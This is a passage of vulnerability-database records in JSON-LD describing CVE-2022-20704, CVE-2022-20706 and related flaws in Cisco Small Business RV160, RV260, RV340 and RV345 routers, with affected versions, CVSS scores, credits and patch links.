            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "date": "2022-02-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "date": "2024-11-21T06:43:21.797000",
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0329

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device. The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0329",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Gaurav Baruah",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-20704",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2022-20704",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20704",
                "impactScore": 2.5,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20704",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2022-20704",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20704",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "REQUIRED",
                "vectorString": "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20704",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20704",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20704",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20704",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-165",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20704",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device.The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20704",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15810",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "id": "VAR-202202-0329",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.396000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183258"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-413/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20704"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/alphabugx/cve-2022-23305"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "date": "2022-02-10T18:15:09.253000",
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20704"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          },
          {
            "date": "2022-02-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          },
          {
            "date": "2024-11-21T06:43:22.110000",
            "db": "NVD",
            "id": "CVE-2022-20704"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004937"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-165"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0321

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0321",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trichimtrich and nyancat0131",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20706",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2022-20706",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
